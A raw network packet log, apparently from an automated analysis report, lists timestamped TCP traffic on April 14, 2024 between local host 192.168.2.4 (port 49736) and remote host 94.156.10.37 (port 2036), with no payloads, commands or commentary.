Apr 14, 2024 08:45:11.813026905 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.813043118 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.813080072 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.813105106 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.813116074 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.813154936 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.813175917 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.813193083 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.813229084 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.813252926 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.813266039 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.813302994 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.813319921 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.813342094 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.813380003 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.813405037 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.813417912 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.813455105 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.813491106 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.813499928 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.813529968 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.813553095 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.813568115 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.813605070 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.813631058 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.813647032 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.813683987 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.813704014 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.813720942 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.813760042 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.813781023 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.813796997 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.813834906 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.813855886 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.813873053 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.813909054 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.813931942 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.813946009 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.813982010 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.814001083 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.814021111 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.814058065 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.814079046 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.814094067 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.814131975 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.814156055 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.814171076 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.814208031 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.814237118 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.814245939 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.814284086 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.814301014 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.814321995 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.814359903 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.814378977 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.814397097 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.814434052 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.814454079 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.814471960 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.814507961 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.814526081 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.814546108 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.814580917 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.814601898 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.814619064 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.814656973 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.814677000 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.814693928 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.814729929 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.814747095 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.814769983 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.814806938 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.814824104 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.814845085 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.814882040 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.814898014 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.814919949 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.814956903 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.814975977 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.814995050 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.815032005 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.815052986 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.815068960 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.815105915 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.815123081 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.815144062 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.815181017 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.815198898 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.815217972 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.815257072 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.815275908 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.815294027 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.815330982 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.815349102 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.815368891 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.815406084 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.815423012 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.815444946 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.815481901 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.815505028 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.815520048 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.815556049 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.815577984 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.815593004 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.815630913 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.815644026 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.815669060 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.815706968 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.815721035 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.815746069 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.815783024 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.815815926 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.815819979 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.815865993 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.815892935 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.815905094 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.815941095 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.815968037 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.815979004 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.816020012 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.816040039 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.816056013 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.816092968 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.816117048 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.816131115 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.816171885 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.816183090 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.816210032 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.816261053 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.816293955 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.816298008 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.816335917 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.816356897 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.816374063 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.816412926 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:11.816423893 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.832072020 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:11.832130909 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.042289019 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.042352915 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.042387962 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.042392015 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.042428017 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.042429924 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.042469978 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.042469978 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.042491913 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.042507887 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.042531013 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.042546034 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.042568922 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.042586088 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.042606115 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.042623997 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.042642117 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.042661905 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.042682886 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.042700052 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.042721987 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.042738914 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.042761087 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.042777061 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.042798996 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.042814970 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.042836905 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.042851925 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.042879105 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.042889118 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.042903900 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.042927980 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.042943954 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.042967081 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.042983055 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.043005943 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.043023109 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.043044090 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.043062925 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.043081999 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.043106079 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.043119907 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.043139935 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.043159008 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.043176889 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.043195963 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.043216944 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.043232918 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.043313980 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.043329000 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.043351889 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.043368101 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.043385983 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.043406010 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.043426037 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.043442965 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.043464899 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.043481112 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.043499947 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.043519974 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.043545008 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.043557882 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.043581009 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.043596029 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.043608904 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.043634892 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.043653965 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.043673038 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.043692112 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.043709993 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.043731928 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.043749094 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.043767929 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.043786049 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.043812037 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.043823004 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.043834925 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.043875933 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.043895006 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.043914080 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.043935061 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.043953896 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.043975115 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.043994904 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.044028044 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.044033051 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.044051886 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.044070959 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.044085979 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.044109106 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.044131041 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.044172049 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.044173002 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.044212103 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.044213057 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.044250011 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.044267893 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.044277906 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.044315100 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.044337034 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.044351101 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.044374943 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.044390917 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.044409990 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.044431925 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.044450045 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.044467926 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.044492960 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.044506073 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.044531107 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.044543028 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.044580936 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.044598103 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.044616938 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.044617891 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.044640064 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.044656992 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.044692993 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.044697046 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.044715881 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.044730902 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.044753075 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.044769049 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.044790030 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.044806957 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.044825077 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.044843912 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.044852972 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.044881105 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.044889927 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.044922113 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.044935942 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.044960976 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.044975996 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.045000076 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.045017004 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.045037031 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.045053005 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.045077085 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.045093060 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.045114994 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.045145988 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.045154095 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.045166016 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.045192003 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.045212984 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.045229912 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.045248985 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.045268059 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.045290947 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.045305967 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.045326948 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.045344114 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.045366049 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.045383930 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.045403957 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.045423031 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.045443058 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.045460939 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.045481920 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.045499086 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.045519114 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.045537949 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.045563936 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.045574903 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.045598030 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.045613050 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.045634031 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.045651913 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.045670986 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.045690060 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.045711040 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.045727968 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.045748949 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.045763016 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.045787096 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.045799971 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.045821905 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.045838118 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.045859098 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.045882940 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.045898914 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.045922041 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.045943022 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.045960903 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.045984030 CEST	49736	2036	192.168.2.4	94.156.10.37
Apr 14, 2024 08:45:12.046000957 CEST	2036	49736	94.156.10.37	192.168.2.4
Apr 14, 2024 08:45:12.046022892 CEST	49736	2036	192.168.2.4	94.156.10.37
